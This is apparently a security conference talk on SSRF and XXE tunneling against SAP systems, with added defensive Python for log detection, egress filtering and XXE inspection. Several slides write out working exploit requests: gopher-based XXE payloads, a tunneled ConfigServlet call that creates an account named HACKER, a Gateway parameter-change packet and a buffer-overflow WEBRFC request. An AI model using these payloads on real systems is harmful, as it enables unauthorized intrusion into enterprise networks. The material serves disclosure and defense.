Enterprise applications: Definitions

Business software is generally any software that helps a business to increase its efficiency or measure its performance:

• Small (MS Office)
• Medium (CRM, Shops)
• Enterprise (ERP, BW...)
Any information an attacker might want, be it a cybercriminal, industrial spy or competitor, is stored in a company's ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. Industrial espionage, sabotage and fraud or insider embezzlement may be very effective if targeted at the victim's ERP system and cause significant damage to the business.
Business-critical systems architecture

• Located in a secure subnetwork
• Secured by firewalls
• Monitored by IDS systems

Noahhh...

But let's assume that they are, because it will be much more interesting to attack them.

Secure corporate network
But wait. There must be some links.

Real corporate network

And... attackers can use them!

Corporate network attack scenario

But how?
SSRF, as in Server-Side Request Forgery: an attack that was discussed in 2008, with very little information about theory or practical examples.

Like any new term, SSRF does not describe something completely new, such as a new type of vulnerability. SSRF-style attacks were known before.
SSRF History: Basics

• We send Packet A to Service A
• Service A initiates Packet B to Service B
• Services can be on the same or different hosts
• We can manipulate some fields of Packet B within Packet A
• Various SSRF attacks depend on how many fields we can control in Packet B

[Diagram: Packet A (attacker to Service A) and Packet B (Service A to Service B)]
SSRF history: World research

Deral Heiland - Shmoocon 2008
- Web Portals: Gateway To Information Or A Hole In Our Perimeter Defenses
- Web portlets allow loading files from other HTTP sources
- Possible to attack the internal network
- SSRF via URL parameter

Spiderlabs 2012
- http://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.html
- SSRF via XXE

Vladimir Vorontsov 2012
- SSRF via XXE
SSRF history: My research

• SSRF is much more than the listed examples
• Began thinking about different kinds of SSRF in 2009
• Played with Oracle database hacks while writing a book

The idea was to use minimum rights in one application to send something that can make maximum impact on another application.
SSRF History: My research in Oracle bypass

• Problem
- An old vulnerability in the Oracle listener in Set_log_file
- Secured by LOCAL_OS_AUTHENTICATION in 10G

• Attack
- A user with CONNECT privileges can run UTL_TCP functions
- Using UTL_TCP it is possible to construct any TCP packet and send it to the listener
- The connection will be from a local IP, so we bypass the LOCAL_OS_AUTHENTICATION restrictions
SSRF History: ERPScan's research in SMBRelay

• SMBRelay is another example of SSRF
• A UNC request can be initiated from different sources
• We have collected information about different ways to call a UNC path having minimum rights
- From SAP NetWeaver ABAP
- From SAP NetWeaver J2EE
- From MSSQL
- From Oracle DB
- From browser
- From USB
- By spoofing
- Etc.
• It is published under the name "SMBRelay Bible"
SSRF history: How to exploit
SSRF history: Conclusion

What we wanted to do here:

• Collect the information about SSRF attacks
• Categorize them
• Show new SSRF attacks
• Show examples of SSRF in SAP
SSRF at a glance

Ideal SSRF

The idea is to find victim server interfaces that will allow sending packets initiated by the victim server to the localhost interface of the victim server, or to another server secured from the outside by a firewall. Ideally, this interface:

• Must allow sending any packet to any host and any port
• Must be accessible remotely without authentication
SSRF Types

• Trusted SSRF (can forge requests to remote services, but only to predefined ones)
• Remote SSRF (can forge requests to any remote IP and port)
- Simple Remote SSRF (no control on application level)
- Partial Remote SSRF (control of some fields on application level)
- Full Remote SSRF (control on application level)
Trusted SSRF

• Trusted because they can be exploited through predefined trusted connections.
• RDBMS systems and ERP systems give you the functionality to make trusted links.
• Through those predefined links, the attacker can send some packets to linked systems.
• Need to have access to the application or a vulnerability like SQL Injection.
• Examples
- SAP NetWeaver
- Oracle DB
- MsSQL DB
Trusted SSRF: MsSQL

• Need at least public rights
• Use MsSQL trusted links
• Can be used with predefined passwords
• Can be used to obtain info from host B

SELECT * FROM OPENQUERY(ServiceB, 'SELECT @@VERSION')
Trusted SSRF: Oracle Database

• Need at least public rights
• Use Oracle trusted links
• Can be used with predefined passwords
• Can be used to send requests to and obtain responses from host B

SELECT * FROM myTable@HostB

EXECUTE Schema.Package.Procedure('Parameter')@HostB
SSRF Types: SAP

• SAP NetWeaver can have trusted links
• Predefined in the SM59 transaction
• Use the RFC protocol and user authentication
• Usually with predefined passwords
• Usually with SAP_ALL rights
• Can be secured by [illegible in source]

Can be exploited by connecting from the TST to the PRD system.
Trusted SSRF: Conclusion

• Advantages for the attacker
- Interesting
- There are examples of dangerous attacks
- Links usually exist across the enterprise
- The attack is very stealthy because the behavior looks normal

• Disadvantages
- Username and password needed
- Existing link needed
Remote SSRF

A more interesting class:

• Control what to send and how
• Forge requests to any host and any port from a trusted source, even if you cannot connect to those hosts directly
• Connect to services that listen only on the localhost interface as well
• Depending on what exactly we can control, there are at least 3 types of Remote SSRF
Remote SSRF: Subtypes

Subtype   Dest IP / Dest port   Packet B application level
Simple    controlled            can't control
Partial   controlled            control some fields
Full      controlled            control all fields

The most popular example is the ability to remotely scan for open ports and IP addresses.

Affected software:
- SAP NetWeaver wsnavigator (sapnote 1394544, 871394)
- SAP NetWeaver ipcpricing (sapnote 1545883)
- SAP BusinessObjects viewrpt (sapnote 1583610)
Simple Remote SSRF: port scan via ipcpricing JSP

• It is possible to scan the internal network from the Internet
• Authentication is not required
• SAP NetWeaver J2EE engine is vulnerable

/ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=31337&dispatcher=&targetClient=&view=
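From the defender's side, the port scan above leaves a characteristic trace: one external client making the J2EE engine connect to many distinct internal host:port pairs through one endpoint. The following is an added example (not code from the talk or from SAP) that runs that check over constructed access-log lines; the endpoint table, thresholds and sample addresses are this example's own.

```python
"""Detect SSRF-driven port scanning in web access logs.

Added example, not part of the original talk or of any SAP component.
It parses constructed Apache-style access log lines for the ipcpricing
BufferOverview.jsp endpoint, where an unauthenticated client chooses the
internal `server` and `port` the J2EE engine connects to, and flags clients
that drive the server at many distinct targets.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (combined log format, simplified).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Aug/2012:10:00:01 +0000] "GET /ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=22&dispatcher=&targetClient=&view= HTTP/1.1" 200 512
203.0.113.7 - - [01/Aug/2012:10:00:02 +0000] "GET /ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=80&dispatcher=&targetClient=&view= HTTP/1.1" 200 512
203.0.113.7 - - [01/Aug/2012:10:00:02 +0000] "GET /ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=3300&dispatcher=&targetClient=&view= HTTP/1.1" 200 512
203.0.113.7 - - [01/Aug/2012:10:00:03 +0000] "GET /ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=31337&dispatcher=&targetClient=&view= HTTP/1.1" 200 512
203.0.113.7 - - [01/Aug/2012:10:00:03 +0000] "GET /ipcpricing/ui/BufferOverview.jsp?server=172.16.0.14&port=3300&dispatcher=&targetClient=&view= HTTP/1.1" 200 512
198.51.100.9 - - [01/Aug/2012:10:00:05 +0000] "GET /ipcpricing/ui/BufferOverview.jsp?server=ipcserver&port=3300&dispatcher=&targetClient=&view= HTTP/1.1" 200 512
198.51.100.9 - - [01/Aug/2012:10:01:05 +0000] "GET /irj/portal HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Endpoints whose query string names an outbound connection target.
# Maps request path -> (host parameter name, port parameter name).
SSRF_ENDPOINTS = {
    "/ipcpricing/ui/BufferOverview.jsp": ("server", "port"),
}


def extract_targets(log_text):
    """Yield (client, host, port) for every request to a known SSRF-prone endpoint."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        params = SSRF_ENDPOINTS.get(url.path)
        if params is None:
            continue
        qs = parse_qs(url.query, keep_blank_values=True)
        host = qs.get(params[0], [""])[0]
        port = qs.get(params[1], [""])[0]
        if host or port:
            yield m.group("client"), host, port


def detect_port_scans(log_text, threshold=3):
    """Return {client: sorted distinct (host, port)} for clients at or above `threshold`.

    A legitimate UI session points at one pricing server; a client that makes
    the engine connect to many distinct host:port pairs is using the endpoint
    as a scanner.
    """
    targets = defaultdict(set)
    for client, host, port in extract_targets(log_text):
        targets[client].add((host, port))
    return {c: sorted(t) for c, t in targets.items() if len(t) >= threshold}


if __name__ == "__main__":
    for client, hits in detect_port_scans(SAMPLE_LOG).items():
        print(f"{client}: {len(hits)} distinct internal targets, e.g. {hits[:3]}")
```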

















Partial Remote SSRF: Ability to control fields

The most popular type, with many examples:

• Remote login bruteforce
• Remote file read
• SMBRelay
• HTTP attacks to other services
• XXE attacks
Simple Remote SSRF: Login bruteforce

• SAP J2EE web application
• Still patching (can't disclose)
• Possible to connect to any host and test a password
• If the service is running on an external SAP Portal, it is possible, remotely from the Internet, to:
- Bruteforce logins to internal resources and then continue with other attacks
- Bruteforce logins until they are locked (Denial of Service)
Partial Remote SSRF: SMBRelay

• SMBRelay - a Windows bug which can be exploited by forging a UNC connection to a system that we control
• As a result, it is possible to get access to the Windows server with the rights of the <SID>adm user
• Dozens of different possibilities to forge a UNC connection
- From SAP web services (sapnote 1503579, 1498575)
- From RFC functions (sapnote 1554030)
- From SAP transactions, reports (sapnote 1583286)

Possible from every place where you can call something from a remote path like \\172.16.0.1\file, but you need to be inside the network.
Partial Remote SSRF: HTTP attacks to other services

• Many places where you can call HTTP URLs
- Transactions
- Reports
- RFC functions
- Web services
- XML entities
• The connection will be initiated by the server to another server, so you can bypass firewall restrictions
XXE Attacks on other services

• Via XXE it is also possible to run HTTP calls

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe1 SYSTEM "http://172.16.0.1:80/someservice" >]>
<foo>&xxe1;</foo>

Successfully executed a similar attack on a banking system during a pen-test.
XXE Attacks in SAP

• There are many XML interfaces in a SAP application
• Many of them are vulnerable to XXE
• There are patches from SAP
• Most of those services require authentication
• But we want to do this without auth
[Dilbert strip: "We can only afford to fix the high-priority bugs." / "If we don't fix 100% of the bugs, the software will be 100% useless."]
DilbertMSG Web service in SAP

• DilbertMSG web service
• No, I'm not kidding
• Uses SOAP XML
• For testing purposes
• Shipped with SAP PI < 7.1 by default
• Accessed without authorization
• Patched just a month ago in SAP Security note 1707494
DilbertMSG Web service in SAP

[Browser screenshot of http://172.16.0.63:50100/XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG, showing the response:]

<dmsg:statements xmlns:dmsg="http://sap.com/fun/dilbert/msg" title="Mission Statements">
  <!-- see http://172.16.0.63:50100/XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?help for usage options -->
  <statement>
    The customer can count on us to quickly administrate diverse deliverables.
  </statement>
</dmsg:statements>
What can we do next?

• Usually, XXE is used to call an HTTP or UNC path
• But there are much more interesting options, depending on the parser:
- ftp://
- ldap://
- jar://
- gopher://
- mailto://
- ssh2://
• All of them allow connecting to special services and sending special commands (Partial SSRF)
• But they are not universal... or
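Each scheme in the list turns the server into a client of some internal service, which is why the server-side check matters more than which schemes the parser happens to support. The following is an added example (not code from the talk or from any SAP component) of the egress policy a feature that fetches externally supplied URLs should apply; `check_outbound_url`, the hostnames and the resolver hook are this example's own assumptions.

```python
"""Egress policy for server-initiated requests (the SSRF defence side).

Added example; not code from the talk or from any SAP component. Allow only
the schemes the feature really needs, refuse any destination in loopback,
private or otherwise non-routable address space, and restrict the port. The
resolver parameter exists so the code runs offline; production code would
also pin the resolved address for the real connection so a second DNS lookup
cannot rebind the name to an internal host.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def system_resolver(host):
    """Resolve a hostname (or pass an IP literal through) via the system DNS."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_internal(addr):
    """True for loopback, private, link-local, multicast, reserved or unspecified addresses."""
    ip = ipaddress.ip_address(addr)
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_outbound_url(url, resolver=system_resolver):
    """Return (allowed, reason) for a URL the server is about to fetch on a client's behalf."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    # Check every address the name resolves to: a record set mixing one public
    # and one internal address must still be refused.
    try:
        addrs = resolver(host)
    except (socket.gaierror, UnicodeError):
        addrs = set()
    if not addrs:
        return False, "host does not resolve"
    for addr in sorted(addrs):
        if is_internal(addr):
            return False, f"{host} resolves to internal address {addr}"
    return True, "ok"


if __name__ == "__main__":
    # IP-literal targets taken from the slides; all are refused, for different reasons.
    for url in ("http://172.16.0.1:80/someservice",
                "gopher://172.16.0.1:3300/AAAAAAAAA",
                "http://127.0.0.1/",
                "http://172.16.0.13:31337/"):
        print(url, "->", check_outbound_url(url))
```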
Okay, so Full Remote SSRF

Full Remote SSRF

[Diagram: Server A (Portal or XI)]

How? The gopher URI scheme:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]>
<foo>&date;</foo>
XXE Tunneling

[Diagram: Server A (Portal or XI) receives the request below and opens the gopher connection to 172.16.0.1:3300]

POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: 192.168.0.1:8000

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]>
<foo>&date;</foo>
Exploiting SAP with XXE tunnel

Why SAP?

• Because we spend a lot of time researching SAP
• Because it is a very popular business application
• Because we found an XML interface with XXE which can be exploited anonymously
• Because we can :))
Remote SSRF threats

• Exploit OS vulnerabilities
• Exploit old SAP application vulnerabilities
• Bypass SAP security restrictions
• Exploit vulnerabilities in local services
XXE Tunneling to Verb Tampering

• Verb Tampering: an architecture vulnerability in the SAP J2EE engine
• Was presented by me at the previous BlackHat
• Patched by SAP in security note 1589525
• Allows unauthorized access to NetWeaver web services
- Creation of a new user with any role
- Running OS commands
- Remotely turning OFF the application server
• Many companies still don't patch
• Some companies disable access by Web Dispatcher (ACL)
• It means that the vulnerability still exists
XXE Tunneling to Verb Tampering

POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: company.com:80

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY date SYSTEM "gopher://172.16.0.1:3300/HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=HACKER,PASSWORD=PassWOrd" >]>
<foo>&date;</foo>

[Diagram]
Server A on the Internet (Web Dispatcher), http://company.com: a direct GET /ctc is answered with "No such service 404" (filtered by Web Dispatcher).
Server B in the DMZ (SAP Portal), 172.16.0.1: the tunneled request "HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=HACKER,PASSWORD=PassWOrd" arrives at 172.16.0.1 port 50000.
XXE Tunneling to Buffer Overflow

• A buffer overflow vulnerability found by Virtual Forge in the ABAP Kernel (fixed in sapnote 1487330)
• Hard to exploit because it requires calling an RFC function which calls the Kernel function
• But even such a complex attack can be exploited
• Get ready for the hardcore
XXE Tunneling to Buffer Overflow (Hint 1)

• It is hard (maybe not possible) to exploit it by an RFC call because it needs multiple packets to call the RFC function
• So we decided to exploit it via WEBRFC
• Can be fixed by sapnotes: 1394100, 1536640, 1528822, 1453457
• According to our report, even on the Internet WEBRFC is installed in 40% of NetWeaver ABAP systems
XXE Tunneling to Buffer Overflow (Hint 2)

• Shellcode size is limited to 255 bytes (name parameter)
• As we don't have a direct connection to the Internet from the vulnerable system, we want to use DNS tunneling shellcode to connect back
• But the XML engine saves some XML data in RWX memory
• So we can use an egghunter
• Any shellcode can be uploaded
XXE Tunneling to Buffer Overflow: Packet B

POST /sap/bc/soap/rfc?sap-client=000 HTTP/1.1
Authorization: Basic UlFQKjowMjA3NTk3==
Host: company.com:80
User-Agent: ERPSCAN Pentesting tool v 0.2
Content-Type: text/xml; charset=utf-8
Cookie: sap-client=000
Content-Length: 2271

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><SOAP-ENV:Body><m:RSPO_R_SAPGPARAM xmlns:m="urn:sap-com:document:sap:rfc:functions"><HEAP_EGG>[payload elided]</HEAP_EGG><NAME>[255-byte payload elided]</NAME></m:RSPO_R_SAPGPARAM></SOAP-ENV:Body></SOAP-ENV:Envelope>
XXE Tunneling to Buffer Overflow (Hint 3)

• The next step is to pack Packet B into Packet A
• We need to insert non-printable symbols
• God bless gopher; it supports URL encoding like HTTP
• It will also help us evade IDS systems

POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: sapserver.com:80
Content-Length: 7730

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY date SYSTEM "gopher://[URL-encoded Packet B]" >]>
<foo>&date;</foo>
Final exploit: Packet B in packet A

POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Content-Length: 7730

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE in [<!ENTITY foo SYSTEM "gopher://172.16.10.65:8000/%50%4f%53%54%20%2f%73%61%70%2f%62%63%2f%73%6f%61%70%2f%72%66%63%3f[remaining URL-encoded bytes of Packet B elided]">]><dmsg:generate xmlns:dmsg='http://sap.com/fun/dilbert/msg' title='&foo;'>1</dmsg:generate>
XXE Tunneling to Buffer Overflow

Server A on the Internet (SAP XI), http://company.com, receives:

POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: sapserver.com:80

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY date SYSTEM "gopher://[packetB]" >]>
<foo>&date;</foo>

Server B in the DMZ receives Packet B.

Full control over the internal system through the Internet.
XXE Tunneling to Rsh

• Rlogin is an old service
• But many old Unix systems like HP-UX, AIX, SunOS have it by default
• Many SAP systems are based on the listed OS
• In SAP it is used to execute trusted commands
• Rlogin allows getting shell access remotely
• Potentially exploitable via XXE
SSRF threats

• Exploit any old vulnerabilities in the OS or database, because systems secured by a firewall usually lack patches
• Exploit old SAP application vulnerabilities
• Bypass SAP security restrictions
• A way to open new vulnerabilities
Bypass SAP security restrictions

It is possible to bypass many SAP security restrictions. However, it is not so easy, and it needs additional research for every service.

• SAP Gateway
• SAP Message Server
• Oracle Remote OS Authentication
• Other remote services
SAP Gateway server security bypass

• SAP Gateway - remote management of SAP
• Different attacks are possible, like registering a fake RFC service
• Now secured by the gw/monitor option
- 0: No monitor commands are accepted
- 1: Only monitor commands from the local gateway monitor are accepted
- 2: Monitor commands from local and remote monitors are accepted
• With XXE Tunneling, we can act like a local monitor, bypassing the restriction
• For example, we can change SAP Gateway parameters
SAP Gateway server security bypass

...s for sending binary data through Gopher

1. You need to encode non-character data using URL encoding.
2. Gopher changes some of the first symbols of the packet to its own.
   - To bypass it, you need to enter any symbol before the packet.
   - This symbol will be deleted and no changes will occur.
3. Symbols from 8A to 99 are not allowed, so if they exist in the packet:
   1. You can't exploit the vulnerability.
   2. You should replace them with symbols that are allowed and hope that they are not necessary.
   3. It was found that in the Gateway protocol symbol 88 is used, but it can be changed.
SAP Gateway server security bypass: Exploit

POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: 172.16.10.63:8001
Content-Length: 621

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE in [<!ENTITY ltt SYSTEM "gopher://172.16.0.1:3301/a%00%00%00%7A%43%4F%4E%54%00%02%00%7A%67%77%2F%6D%61%78%5F%73%6C%65%65%70[remaining URL-encoded bytes of the Gateway packet elided]">]><dmsg:generate xmlns:dmsg='http://sap.com/fun/dilbert/msg' title='&ltt;'>1</dmsg:generate>
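Everything a gateway or IDS needs in order to see this tunnel is in the request body: a DOCTYPE, an external entity, and a gopher URI whose percent-decoded selector (minus the leading item-type character, the "any symbol before the packet" rule above) is the raw TCP payload for the internal service. The following is an added example, not code from the talk, from the ERPScan scanner or from SAP, that extracts external entity declarations from inbound XML, classifies them, and reconstructs the tunneled bytes for a gopher entity; the test payloads are constructed here after the slides, and the gopher selector is the start of the Gateway packet above, truncated.

```python
"""Inspect inbound XML for external entities that tunnel requests (XXE as SSRF).

Added example; not code from the talk, from the ERPScan scanner or from SAP.
A gateway in front of an XML endpoint can refuse any document that carries a
DOCTYPE with external entities, and for incident response it can reconstruct
what a gopher:// entity would have made the server send. The gopher decoding
follows the rules given in the slides: percent-decode the selector, then drop
the first character, which the gopher client consumes as the item type.
"""
import ipaddress
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Matches <!ENTITY name SYSTEM "uri"> and <!ENTITY name PUBLIC "id" "uri">,
# including parameter entities (<!ENTITY % name ...>).
ENTITY_RE = re.compile(
    rb'<!ENTITY\s+(?:%\s*)?(?P<name>\S+)\s+'
    rb'(?:SYSTEM|PUBLIC\s+(?:"[^"]*"|\'[^\']*\'))\s+'
    rb'(?P<q>["\'])(?P<uri>.*?)(?P=q)',
    re.S,
)
# Schemes an XML endpoint might legitimately dereference; everything else
# (gopher, ftp, ldap, jar, ...) turns the parser into a generic TCP client.
SAFE_SCHEMES = {"http", "https"}


def external_entities(xml_bytes):
    """Return [(entity name, URI)] declared in the document's DTD internal subset."""
    parts = xml_bytes.split(b"<!DOCTYPE", 1)
    if len(parts) < 2:
        return []
    return [(m.group("name").decode("latin-1"), m.group("uri").decode("latin-1"))
            for m in ENTITY_RE.finditer(parts[1])]


def decode_gopher(uri):
    """Return (host, port, selector bytes) exactly as a gopher client would send them.

    The URL path is /<item type><selector>; the client strips the slash and the
    single type character and sends the percent-decoded remainder over TCP.
    """
    p = urlsplit(uri)
    raw = unquote_to_bytes(p.path.lstrip("/"))
    return p.hostname, p.port or 70, raw[1:]


def target_is_internal(host):
    """True when the host is an IP literal in loopback or private space."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname: undecidable without resolving it
    return ip.is_loopback or ip.is_private


def inspect_xml(xml_bytes):
    """Classify a request body. doctype=False with no findings is clean."""
    findings = []
    for name, uri in external_entities(xml_bytes):
        parsed = urlsplit(uri)
        scheme = parsed.scheme.lower()
        internal = target_is_internal(parsed.hostname or "")
        finding = {
            "entity": name,
            "uri": uri,
            "scheme": scheme,
            "internal_target": internal,
            "severity": "high" if scheme not in SAFE_SCHEMES or internal else "medium",
        }
        if scheme == "gopher":
            host, port, payload = decode_gopher(uri)
            finding["tunneled"] = {"host": host, "port": port, "payload": payload}
        findings.append(finding)
    return {"doctype": b"<!DOCTYPE" in xml_bytes, "findings": findings}


# Constructed test inputs modelled on the slides (the gopher selector is the
# start of the Gateway packet shown above, truncated).
HTTP_XXE = (b'<?xml version="1.0" encoding="ISO-8859-1"?>\n<!DOCTYPE foo [\n<!ELEMENT foo ANY>\n'
            b'<!ENTITY xxe1 SYSTEM "http://172.16.0.1:80/someservice" >]>\n<foo>&xxe1;</foo>')
GOPHER_XXE = (b'<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE in [<!ENTITY ltt SYSTEM '
              b'"gopher://172.16.0.1:3301/a%00%00%00%7A%43%4F%4E%54%00%02%00%7A%67%77%2F%6D%61%78%5F%73%6C%65%65%70">]>'
              b"<dmsg:generate xmlns:dmsg='http://sap.com/fun/dilbert/msg' title='&ltt;'>1</dmsg:generate>")
BENIGN = (b'<dmsg:statements xmlns:dmsg="http://sap.com/fun/dilbert/msg" title="Mission Statements">'
          b'<statement>ok</statement></dmsg:statements>')

if __name__ == "__main__":
    for body in (BENIGN, HTTP_XXE, GOPHER_XXE):
        report = inspect_xml(body)
        print("doctype:", report["doctype"])
        for f in report["findings"]:
            print(" ", f["severity"], f["scheme"], f["uri"][:60], f.get("tunneled", {}).get("payload"))
```

The simplest policy that follows from the report is to reject any body with `doctype` set, which is also what disabling DOCTYPE declarations in the parser itself achieves.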





















SAP Message Server security bypass

• Message Server: load balancer
• If not configured properly, it can be vulnerable to different attacks, like configuring a fake application server or changing parameters
• However, by default it is now secured by the ms/monitor option
- 0: Only application servers are allowed to change the internal memory of the message server and perform monitoring functions (default).
- 1: External (monitoring) programs are also allowed to do this.
• Message Server uses a session
• It needs to send multiple packets to execute an attack
• Seems impossible, but...
• More time needed for investigation
Oracle DB security bypass

• Oracle DB: the backend that stores all data
• If not configured properly, it can be vulnerable to unauthorized access using the <SID>adm username only, without a password
• To secure Oracle DB, it is recommended to set:
- tcp.validnode_checking = yes
- tcp.invited_nodes = (hostname1, hostname2)
- tcp.excluded_nodes = (other)
• The same problems for bypassing as in Message Server
• Still investigating
Other remote services

• Dozens of different SAP services
- More than 10 in ABAP
- More than 20 in J2EE
- More than 20 others
• All of them are enabled by default and can have some issues
• Can sometimes be secured by firewalls
• Can be secured by ACLs
• Some vulnerabilities reported by us are still not patched
• Any single-packet exploit can be executed
A way to open new vulnerabilities

• Before XML Tunneling, vulnerabilities in the local services which only listen on 127.0.0.1 were not interesting
• Now they are more likely to be exploited
• It is another area for research
Conclusion?

"Let's put it under a firewall" is not a solution anymore.
XXE Scanner

Found an XML interface and want to try if it is vulnerable to XXE?

Or: found an XXE in some project and want to know which attacks are possible?

Or: found an XXE, and know a vulnerable service inside the company, and want to exploit it?
How is it working?

• You enter a vulnerable URL
• You enter a test case
• You customize the predefined XML or SOAP format
Choosing action

• Test
- Test if XXE is working
• Scan
- Scan for available information
• Attack
- Exploit SSRF or chained attack
Action: Test

1. Test for local file read
2. Test for remote share read
3. Test for HTTP scheme support
4. Brute-force support for different schemes

If the tests are OK, you can collect the information now.
Action: Scan

1. Bruteforce and download files
2. Directory listing
3. Port scan
4. SMB shares scan
5. HTTP URL scan
Action: Exploit

1. Send a custom SSRF HTTP packet
2. Send a custom TCP packet by gopher
3. Exploit Windows OS + DNS shellcode
4. Exploit WAGO PLC

Soon, others may appear.
Conclusion

• SSRF attacks are very dangerous
• They have a very wide range that is still poorly covered
• The gopher example is not the only one, I suppose
• We only looked at some SAP J2EE engine issues
• Just with a brief look at current security options, they were broken
• ERPScan is working closely with SAP to fix this and other architectural problems in SAP applications

All application servers based on the JRE are vulnerable!